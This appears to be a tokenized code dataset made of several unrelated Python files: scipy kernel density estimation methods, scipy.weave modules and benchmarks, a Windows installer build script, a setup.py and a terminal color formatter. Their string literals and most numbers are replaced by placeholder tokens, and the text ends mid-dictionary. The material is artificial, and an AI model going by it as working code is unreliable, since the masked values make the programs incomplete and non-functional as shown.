result = result / self . 
_norm_factor <EOL> return result <EOL> __call__ = evaluate <EOL> def integrate_gaussian ( self , mean , cov ) : <EOL> """<STR_LIT>""" <EOL> mean = atleast_1d ( squeeze ( mean ) ) <EOL> cov = atleast_2d ( cov ) <EOL> if mean . shape != ( self . d , ) : <EOL> raise ValueError ( "<STR_LIT>" % self . d ) <EOL> if cov . shape != ( self . d , self . d ) : <EOL> raise ValueError ( "<STR_LIT>" % self . d ) <EOL> mean = mean [ : , newaxis ] <EOL> sum_cov = self . covariance + cov <EOL> sum_cov_chol = linalg . cho_factor ( sum_cov ) <EOL> diff = self . dataset - mean <EOL> tdiff = linalg . cho_solve ( sum_cov_chol , diff ) <EOL> sqrt_det = np . prod ( np . diagonal ( sum_cov_chol [ <NUM_LIT:0> ] ) ) <EOL> norm_const = power ( <NUM_LIT:2> * pi , sum_cov . shape [ <NUM_LIT:0> ] / <NUM_LIT> ) * sqrt_det <EOL> energies = sum ( diff * tdiff , axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> result = sum ( exp ( - energies ) , axis = <NUM_LIT:0> ) / norm_const / self . n <EOL> return result <EOL> def integrate_box_1d ( self , low , high ) : <EOL> """<STR_LIT>""" <EOL> if self . d != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> stdev = ravel ( sqrt ( self . covariance ) ) [ <NUM_LIT:0> ] <EOL> normalized_low = ravel ( ( low - self . dataset ) / stdev ) <EOL> normalized_high = ravel ( ( high - self . dataset ) / stdev ) <EOL> value = np . mean ( special . ndtr ( normalized_high ) - <EOL> special . ndtr ( normalized_low ) ) <EOL> return value <EOL> def integrate_box ( self , low_bounds , high_bounds , maxpts = None ) : <EOL> """<STR_LIT>""" <EOL> if maxpts is not None : <EOL> extra_kwds = { '<STR_LIT>' : maxpts } <EOL> else : <EOL> extra_kwds = { } <EOL> value , inform = mvn . mvnun ( low_bounds , high_bounds , self . dataset , <EOL> self . covariance , ** extra_kwds ) <EOL> if inform : <EOL> msg = ( '<STR_LIT>' % <EOL> ( self . d * <NUM_LIT:1000> ) ) <EOL> warnings . warn ( msg ) <EOL> return value <EOL> def integrate_kde ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . 
d != self . d : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if other . n < self . n : <EOL> small = other <EOL> large = self <EOL> else : <EOL> small = self <EOL> large = other <EOL> sum_cov = small . covariance + large . covariance <EOL> sum_cov_chol = linalg . cho_factor ( sum_cov ) <EOL> result = <NUM_LIT:0.0> <EOL> for i in range ( small . n ) : <EOL> mean = small . dataset [ : , i , newaxis ] <EOL> diff = large . dataset - mean <EOL> tdiff = linalg . cho_solve ( sum_cov_chol , diff ) <EOL> energies = sum ( diff * tdiff , axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> result += sum ( exp ( - energies ) , axis = <NUM_LIT:0> ) <EOL> sqrt_det = np . prod ( np . diagonal ( sum_cov_chol [ <NUM_LIT:0> ] ) ) <EOL> norm_const = power ( <NUM_LIT:2> * pi , sum_cov . shape [ <NUM_LIT:0> ] / <NUM_LIT> ) * sqrt_det <EOL> result /= norm_const * large . n * small . n <EOL> return result <EOL> def resample ( self , size = None ) : <EOL> """<STR_LIT>""" <EOL> if size is None : <EOL> size = self . n <EOL> norm = transpose ( multivariate_normal ( zeros ( ( self . d , ) , float ) , <EOL> self . covariance , size = size ) ) <EOL> indices = randint ( <NUM_LIT:0> , self . n , size = size ) <EOL> means = self . dataset [ : , indices ] <EOL> return means + norm <EOL> def scotts_factor ( self ) : <EOL> return power ( self . n , - <NUM_LIT:1.> / ( self . d + <NUM_LIT:4> ) ) <EOL> def silverman_factor ( self ) : <EOL> return power ( self . n * ( self . d + <NUM_LIT> ) / <NUM_LIT> , - <NUM_LIT:1.> / ( self . d + <NUM_LIT:4> ) ) <EOL> covariance_factor = scotts_factor <EOL> covariance_factor . __doc__ = """<STR_LIT>""" <EOL> def set_bandwidth ( self , bw_method = None ) : <EOL> """<STR_LIT>""" <EOL> if bw_method is None : <EOL> pass <EOL> elif bw_method == '<STR_LIT>' : <EOL> self . covariance_factor = self . scotts_factor <EOL> elif bw_method == '<STR_LIT>' : <EOL> self . covariance_factor = self . silverman_factor <EOL> elif np . 
isscalar ( bw_method ) and not isinstance ( bw_method , string_types ) : <EOL> self . _bw_method = '<STR_LIT>' <EOL> self . covariance_factor = lambda : bw_method <EOL> elif callable ( bw_method ) : <EOL> self . _bw_method = bw_method <EOL> self . covariance_factor = lambda : self . _bw_method ( self ) <EOL> else : <EOL> msg = "<STR_LIT>" "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> self . _compute_covariance ( ) <EOL> def _compute_covariance ( self ) : <EOL> """<STR_LIT>""" <EOL> self . factor = self . covariance_factor ( ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _data_covariance = atleast_2d ( np . cov ( self . dataset , rowvar = <NUM_LIT:1> , <EOL> bias = False ) ) <EOL> self . _data_inv_cov = linalg . inv ( self . _data_covariance ) <EOL> self . covariance = self . _data_covariance * self . factor ** <NUM_LIT:2> <EOL> self . inv_cov = self . _data_inv_cov / self . factor ** <NUM_LIT:2> <EOL> self . _norm_factor = sqrt ( linalg . det ( <NUM_LIT:2> * pi * self . covariance ) ) * self . n <EOL> def pdf ( self , x ) : <EOL> """<STR_LIT>""" <EOL> return self . evaluate ( x ) <EOL> def logpdf ( self , x ) : <EOL> """<STR_LIT>""" <EOL> return np . log ( self . evaluate ( x ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function <EOL> import sys <EOL> from numpy import deprecate <EOL> if sys . version_info [ <NUM_LIT:0> ] >= <NUM_LIT:3> : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> @ deprecate ( old_name = "<STR_LIT>" , new_name = "<STR_LIT>" ) <EOL> def _deprecated ( ) : <EOL> pass <EOL> try : <EOL> _deprecated ( ) <EOL> except DeprecationWarning as e : <EOL> pass <EOL> from . weave_version import weave_version as __version__ <EOL> try : <EOL> from . blitz_tools import blitz , BlitzWarning <EOL> except ImportError : <EOL> pass <EOL> from . inline_tools import inline <EOL> from . import ext_tools <EOL> from . ext_tools import ext_module , ext_function <EOL> try : <EOL> from . accelerate_tools import accelerate <EOL> except : <EOL> pass <EOL> from numpy . testing import Tester <EOL> test = Tester ( ) . test </s>
<s> from __future__ import absolute_import , print_function <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT:..>' ) <EOL> import inline_tools <EOL> from types import * <EOL> def c_list_map ( func , seq ) : <EOL> """<STR_LIT>""" <EOL> assert ( type ( func ) in [ FunctionType , MethodType , type ( len ) ] ) <EOL> code = """<STR_LIT>""" <EOL> return inline_tools . inline ( code , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def c_list_map2 ( func , seq ) : <EOL> """<STR_LIT>""" <EOL> assert ( type ( func ) in [ FunctionType , MethodType , type ( len ) ] ) <EOL> code = """<STR_LIT>""" <EOL> return inline_tools . inline ( code , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def main ( ) : <EOL> seq = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> print ( '<STR_LIT>' , map ( len , seq ) ) <EOL> print ( '<STR_LIT>' , c_list_map ( len , seq ) ) <EOL> print ( '<STR_LIT>' , c_list_map2 ( len , seq ) ) <EOL> def time_it ( m , n ) : <EOL> import time <EOL> seq = [ '<STR_LIT>' ] * n <EOL> t1 = time . time ( ) <EOL> for i in range ( m ) : <EOL> result = map ( len , seq ) <EOL> t2 = time . time ( ) <EOL> py = t2 - t1 <EOL> print ( '<STR_LIT>' , py ) <EOL> result = c_list_map ( len , seq ) <EOL> t1 = time . time ( ) <EOL> for i in range ( m ) : <EOL> result = c_list_map ( len , seq ) <EOL> t2 = time . time ( ) <EOL> c = t2 - t1 <EOL> print ( '<STR_LIT>' , c ) <EOL> print ( '<STR_LIT>' , py / c ) <EOL> result = c_list_map2 ( len , seq ) <EOL> t1 = time . time ( ) <EOL> for i in range ( m ) : <EOL> result = c_list_map2 ( len , seq ) <EOL> t2 = time . time ( ) <EOL> c = t2 - t1 <EOL> print ( '<STR_LIT>' , c ) <EOL> print ( '<STR_LIT>' , py / c ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) <EOL> time_it ( <NUM_LIT:100> , <NUM_LIT:1000> ) </s>
<s> from __future__ import absolute_import , print_function <EOL> import time <EOL> from scipy import weave <EOL> force = <NUM_LIT:0> <EOL> N = <NUM_LIT> <EOL> def list_append_scxx ( a , Na ) : <EOL> code = """<STR_LIT>""" <EOL> weave . inline ( code , [ '<STR_LIT:a>' , '<STR_LIT>' ] , force = force , verbose = <NUM_LIT:2> , compiler = '<STR_LIT>' ) <EOL> def list_append_c ( a , Na ) : <EOL> code = """<STR_LIT>""" <EOL> weave . inline ( code , [ '<STR_LIT:a>' , '<STR_LIT>' ] , force = force , compiler = '<STR_LIT>' ) <EOL> def list_append_py ( a , Na ) : <EOL> for i in xrange ( Na ) : <EOL> a . append ( i ) <EOL> def time_list_append ( Na ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' , end = '<STR_LIT:U+0020>' ) <EOL> a = [ ] <EOL> t1 = time . time ( ) <EOL> list_append_c ( a , Na ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 , '<STR_LIT>' ) <EOL> a = [ ] <EOL> t1 = time . time ( ) <EOL> list_append_c ( a , Na ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> a = [ ] <EOL> t1 = time . time ( ) <EOL> list_append_scxx ( a , Na ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> a = [ ] <EOL> t1 = time . time ( ) <EOL> list_append_c ( a , Na ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> def list_copy_scxx ( a , b ) : <EOL> code = """<STR_LIT>""" <EOL> weave . inline ( code , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , force = force , verbose = <NUM_LIT:2> , compiler = '<STR_LIT>' ) <EOL> def list_copy_c ( a , b ) : <EOL> code = """<STR_LIT>""" <EOL> weave . inline ( code , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , force = force , compiler = '<STR_LIT>' ) <EOL> def time_list_copy ( N ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' , end = '<STR_LIT:U+0020>' ) <EOL> a = [ <NUM_LIT:0> ] * N <EOL> b = [ <NUM_LIT:1> ] * N <EOL> t1 = time . time ( ) <EOL> list_copy_c ( a , b ) <EOL> t2 = time . 
time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 , '<STR_LIT>' ) <EOL> a = [ <NUM_LIT:0> ] * N <EOL> b = [ <NUM_LIT:1> ] * N <EOL> t1 = time . time ( ) <EOL> list_copy_c ( a , b ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> a = [ <NUM_LIT:0> ] * N <EOL> b = [ <NUM_LIT:1> ] * N <EOL> t1 = time . time ( ) <EOL> list_copy_scxx ( a , b ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> a = [ <NUM_LIT:0> ] * N <EOL> b = [ <NUM_LIT:1> ] * N <EOL> t1 = time . time ( ) <EOL> list_copy_c ( a , b ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> time_list_copy ( N ) </s>
<s> import os <EOL> from os . path import join as pjoin , normpath , exists as pexists , dirname <EOL> import subprocess <EOL> from shutil import rmtree , move as shmove <EOL> import re <EOL> from zipfile import ZipFile <EOL> from lib import get_svn_version , get_scipy_version <EOL> BUILD_MSI = False <EOL> SRC_ROOT = normpath ( pjoin ( os . getcwd ( ) , os . pardir , os . pardir , os . pardir ) ) <EOL> BUILD_ROOT = os . getcwd ( ) <EOL> PYVER = '<STR_LIT>' <EOL> ARCH = '<STR_LIT>' <EOL> PYEXECS = { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> _SSE3_CFG = r"""<STR_LIT>""" <EOL> _SSE2_CFG = r"""<STR_LIT>""" <EOL> _NOSSE_CFG = r"""<STR_LIT>""" <EOL> SITECFG = { "<STR_LIT>" : _SSE2_CFG , "<STR_LIT>" : _SSE3_CFG , "<STR_LIT>" : _NOSSE_CFG } <EOL> options ( <EOL> clean = Bunch ( <EOL> src_dir = SRC_ROOT , <EOL> pyver = PYVER <EOL> ) , <EOL> clean_bootstrap = Bunch ( <EOL> src_dir = SRC_ROOT , <EOL> pyver = PYVER <EOL> ) , <EOL> build_sdist = Bunch ( <EOL> src_dir = SRC_ROOT <EOL> ) , <EOL> build_binary = Bunch ( <EOL> pyver = PYVER , <EOL> arch = ARCH , <EOL> src_root = SRC_ROOT <EOL> ) , <EOL> bootstrap = Bunch ( <EOL> pyver = PYVER , <EOL> src_root = SRC_ROOT <EOL> ) , <EOL> bootstrap_arch = Bunch ( <EOL> pyver = PYVER , <EOL> arch = ARCH <EOL> ) , <EOL> bootstrap_nsis = Bunch ( <EOL> pyver = PYVER , <EOL> src_root = SRC_ROOT <EOL> ) <EOL> ) <EOL> @ task <EOL> def clean ( ) : <EOL> raw_clean ( options . src_dir , options . pyver ) <EOL> @ task <EOL> def clean_bootstrap ( ) : <EOL> raw_clean_bootstrap ( options . pyver ) <EOL> @ task <EOL> def build_sdist ( ) : <EOL> raw_build_sdist ( options . src_dir ) <EOL> @ task <EOL> @ needs ( '<STR_LIT>' ) <EOL> def bootstrap ( ) : <EOL> raw_bootstrap ( options . pyver , options . src_dir ) <EOL> @ task <EOL> def bootstrap_arch ( ) : <EOL> pyver = options . pyver <EOL> arch = options . 
arch <EOL> set_bootstrap_sources ( arch , pyver ) <EOL> @ task <EOL> def bootstrap_nsis ( ) : <EOL> pyver = options . pyver <EOL> bdir = bootstrap_dir ( options . pyver ) <EOL> prepare_nsis_script ( bdir , pyver , get_scipy_version ( options . src_root ) ) <EOL> @ task <EOL> def build_binary ( ) : <EOL> pyver = options . pyver <EOL> arch = options . arch <EOL> raw_build_arch ( pyver , arch , options . src_root ) <EOL> @ task <EOL> @ needs ( '<STR_LIT>' ) <EOL> @ needs ( '<STR_LIT>' ) <EOL> def build_nsis ( ) : <EOL> scipy_verstr = get_scipy_version ( options . src_root ) <EOL> bdir = bootstrap_dir ( options . pyver ) <EOL> prepare_nsis_script ( bdir , options . pyver , scipy_verstr ) <EOL> for arch in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raw_clean_bootstrap ( options . pyver ) <EOL> set_bootstrap_sources ( arch , options . pyver ) <EOL> raw_build_arch ( options . pyver , arch , options . src_root ) <EOL> raw_build_nsis ( options . pyver ) <EOL> def set_bootstrap_sources ( arch , pyver ) : <EOL> bdir = bootstrap_dir ( pyver ) <EOL> write_site_cfg ( arch , cwd = bdir ) <EOL> def get_sdist_tarball ( src_root ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" % get_scipy_version ( src_root ) <EOL> return name <EOL> def prepare_scipy_sources ( src_root , bootstrap ) : <EOL> zid = ZipFile ( pjoin ( src_root , '<STR_LIT>' , get_sdist_tarball ( src_root ) ) ) <EOL> root = '<STR_LIT>' % get_scipy_version ( src_root ) <EOL> for name in zid . namelist ( ) : <EOL> cnt = zid . read ( name ) <EOL> if name . startswith ( root ) : <EOL> name = name . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> newname = pjoin ( bootstrap , name ) <EOL> if not pexists ( dirname ( newname ) ) : <EOL> os . makedirs ( dirname ( newname ) ) <EOL> fid = open ( newname , '<STR_LIT:wb>' ) <EOL> fid . 
write ( cnt ) <EOL> def prepare_nsis_script ( bdir , pyver , numver ) : <EOL> tpl = pjoin ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> source = open ( tpl , '<STR_LIT:r>' ) <EOL> target = open ( pjoin ( bdir , '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> installer_name = '<STR_LIT>' % ( numver , pyver ) <EOL> cnt = "<STR_LIT>" . join ( source . readlines ( ) ) <EOL> cnt = cnt . replace ( '<STR_LIT>' , installer_name ) <EOL> for arch in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> cnt = cnt . replace ( '<STR_LIT>' % arch . upper ( ) , <EOL> get_binary_name ( arch , numver ) ) <EOL> target . write ( cnt ) <EOL> def bootstrap_dir ( pyver ) : <EOL> return pjoin ( BUILD_ROOT , "<STR_LIT>" % pyver ) <EOL> def get_python_exec ( ver ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return PYEXECS [ ver ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % ver ) <EOL> def write_site_cfg ( arch , cwd = None ) : <EOL> if not cwd : <EOL> cwd = os . getcwd ( ) <EOL> scfg = pjoin ( cwd , "<STR_LIT>" ) <EOL> if pexists ( scfg ) : <EOL> os . remove ( scfg ) <EOL> f = open ( scfg , '<STR_LIT:w>' ) <EOL> f . writelines ( SITECFG [ arch ] ) <EOL> f . close ( ) <EOL> def move_binary ( arch , pyver , cwd , scipy_verstr ) : <EOL> if not pexists ( pjoin ( cwd , "<STR_LIT>" ) ) : <EOL> os . 
makedirs ( pjoin ( cwd , "<STR_LIT>" ) ) <EOL> shmove ( pjoin ( cwd , '<STR_LIT>' , get_windist_exec ( pyver , scipy_verstr ) ) , <EOL> pjoin ( cwd , '<STR_LIT>' , get_binary_name ( arch , scipy_verstr ) ) ) <EOL> def get_binary_name ( arch , scipy_verstr ) : <EOL> if BUILD_MSI : <EOL> ext = '<STR_LIT>' <EOL> else : <EOL> ext = '<STR_LIT>' <EOL> return "<STR_LIT>" % ( scipy_verstr , arch , ext ) <EOL> def get_windist_exec ( pyver , scipy_verstr ) : <EOL> """<STR_LIT>""" <EOL> if BUILD_MSI : <EOL> ext = '<STR_LIT>' <EOL> else : <EOL> ext = '<STR_LIT>' <EOL> name = "<STR_LIT>" % ( scipy_verstr , pyver , ext ) <EOL> return name <EOL> def raw_clean ( src_dir , pyver ) : <EOL> sdir = pjoin ( src_dir , "<STR_LIT>" ) <EOL> if pexists ( sdir ) : <EOL> rmtree ( sdir ) <EOL> mani = pjoin ( src_dir , "<STR_LIT>" ) <EOL> if pexists ( mani ) : <EOL> os . remove ( mani ) <EOL> bdir = bootstrap_dir ( pyver ) <EOL> if pexists ( bdir ) : <EOL> rmtree ( bdir ) <EOL> def raw_clean_bootstrap ( pyver ) : <EOL> bdir = bootstrap_dir ( pyver ) <EOL> for d in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if pexists ( pjoin ( bdir , d ) ) : <EOL> rmtree ( pjoin ( bdir , d ) ) <EOL> if pexists ( pjoin ( bdir , "<STR_LIT>" ) ) : <EOL> os . remove ( pjoin ( bdir , "<STR_LIT>" ) ) <EOL> def raw_build_sdist ( cwd ) : <EOL> cmd = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> build_log = "<STR_LIT>" <EOL> f = open ( build_log , '<STR_LIT:w>' ) <EOL> try : <EOL> try : <EOL> st = subprocess . call ( cmd , <EOL> stderr = subprocess . STDOUT , stdout = f , <EOL> cwd = cwd ) <EOL> if st : <EOL> raise RuntimeError ( "<STR_LIT>" % st ) <EOL> finally : <EOL> f . close ( ) <EOL> except ( subprocess . 
CalledProcessError , RuntimeError ) , e : <EOL> print e <EOL> msg = """<STR_LIT>""" % ( cmd , str ( e ) , build_log ) <EOL> raise Exception ( msg ) <EOL> def raw_bootstrap ( pyver , src_dir ) : <EOL> bdir = bootstrap_dir ( pyver ) <EOL> prepare_scipy_sources ( src_dir , bdir ) <EOL> def raw_build_arch ( pyver , arch , src_root ) : <EOL> scipy_verstr = get_scipy_version ( src_root ) <EOL> bdir = bootstrap_dir ( pyver ) <EOL> print "<STR_LIT>" % ( scipy_verstr , get_python_exec ( pyver ) , arch ) <EOL> if BUILD_MSI : <EOL> cmd = [ get_python_exec ( pyver ) , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> else : <EOL> cmd = [ get_python_exec ( pyver ) , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> build_log = "<STR_LIT>" % ( arch , pyver ) <EOL> f = open ( build_log , '<STR_LIT:w>' ) <EOL> try : <EOL> try : <EOL> st = subprocess . call ( cmd , <EOL> stderr = subprocess . STDOUT , stdout = f , <EOL> cwd = bdir ) <EOL> if st : <EOL> raise RuntimeError ( "<STR_LIT>" % st ) <EOL> finally : <EOL> f . close ( ) <EOL> except ( subprocess . CalledProcessError , RuntimeError ) , e : <EOL> print e <EOL> msg = """<STR_LIT>""" % ( cmd , str ( e ) , build_log ) <EOL> raise Exception ( msg ) <EOL> move_binary ( arch , pyver , bdir , scipy_verstr ) <EOL> def raw_build_nsis ( pyver ) : <EOL> bdir = bootstrap_dir ( options . pyver ) <EOL> st = subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = bdir ) <EOL> if st : <EOL> raise RuntimeError ( "<STR_LIT>" ) </s>
<s> import sys <EOL> try : <EOL> from setuptools import setup <EOL> have_setuptools = True <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> have_setuptools = False <EOL> if sys . version_info [ <NUM_LIT:0> ] < <NUM_LIT:3> : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> VERSION = "<STR_LIT>" <EOL> setup_kwargs = { <EOL> "<STR_LIT:version>" : VERSION + '<STR_LIT>' , <EOL> "<STR_LIT:description>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT:url>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : "<STR_LIT>" + VERSION , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : [ ( "<STR_LIT>" , [ '<STR_LIT>' , '<STR_LIT>' ] ) , ] , <EOL> } <EOL> if have_setuptools : <EOL> setup_kwargs [ '<STR_LIT>' ] = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> entry_points = { '<STR_LIT>' : [ '<STR_LIT>' , ] , } , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> ** setup_kwargs <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import string <EOL> from warnings import warn <EOL> RE_BACKGROUND = re . compile ( '<STR_LIT>' ) <EOL> def partial_color_format ( template , style = '<STR_LIT:default>' , cmap = None , hide = False ) : <EOL> """<STR_LIT>""" <EOL> if cmap is not None : <EOL> pass <EOL> elif style in STYLES : <EOL> cmap = STYLES [ style ] <EOL> else : <EOL> warn ( '<STR_LIT>' . format ( style ) , <EOL> RuntimeWarning ) <EOL> cmap = DEFAULT_STYLE <EOL> formatter = string . Formatter ( ) <EOL> esc = ( '<STR_LIT>' if hide else '<STR_LIT>' ) + '<STR_LIT>' <EOL> m = '<STR_LIT:m>' + ( '<STR_LIT>' if hide else '<STR_LIT>' ) <EOL> bopen = '<STR_LIT:{>' <EOL> bclose = '<STR_LIT:}>' <EOL> colon = '<STR_LIT::>' <EOL> expl = '<STR_LIT:!>' <EOL> toks = [ ] <EOL> for literal , field , spec , conv in formatter . parse ( template ) : <EOL> toks . append ( literal ) <EOL> if field is None : <EOL> pass <EOL> elif field in cmap : <EOL> toks . extend ( [ esc , cmap [ field ] , m ] ) <EOL> elif '<STR_LIT:#>' in field : <EOL> field = field . lower ( ) <EOL> pre , _ , post = field . partition ( '<STR_LIT:#>' ) <EOL> f_or_b = '<STR_LIT>' if RE_BACKGROUND . search ( pre ) is None else '<STR_LIT>' <EOL> rgb , _ , post = post . partition ( '<STR_LIT:_>' ) <EOL> c256 , _ = rgb_to_256 ( rgb ) <EOL> color = f_or_b + '<STR_LIT>' + c256 <EOL> mods = pre + '<STR_LIT:_>' + post <EOL> if '<STR_LIT>' in mods : <EOL> color = '<STR_LIT>' + color <EOL> if '<STR_LIT>' in mods : <EOL> color = '<STR_LIT>' + color <EOL> toks . extend ( [ esc , color , m ] ) <EOL> elif field is not None : <EOL> toks . append ( bopen ) <EOL> toks . append ( field ) <EOL> if conv is not None and len ( conv ) > <NUM_LIT:0> : <EOL> toks . append ( expl ) <EOL> toks . append ( conv ) <EOL> if spec is not None and len ( spec ) > <NUM_LIT:0> : <EOL> toks . append ( colon ) <EOL> toks . append ( spec ) <EOL> toks . append ( bclose ) <EOL> return '<STR_LIT>' . 
join ( toks ) <EOL> RGB_256 = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
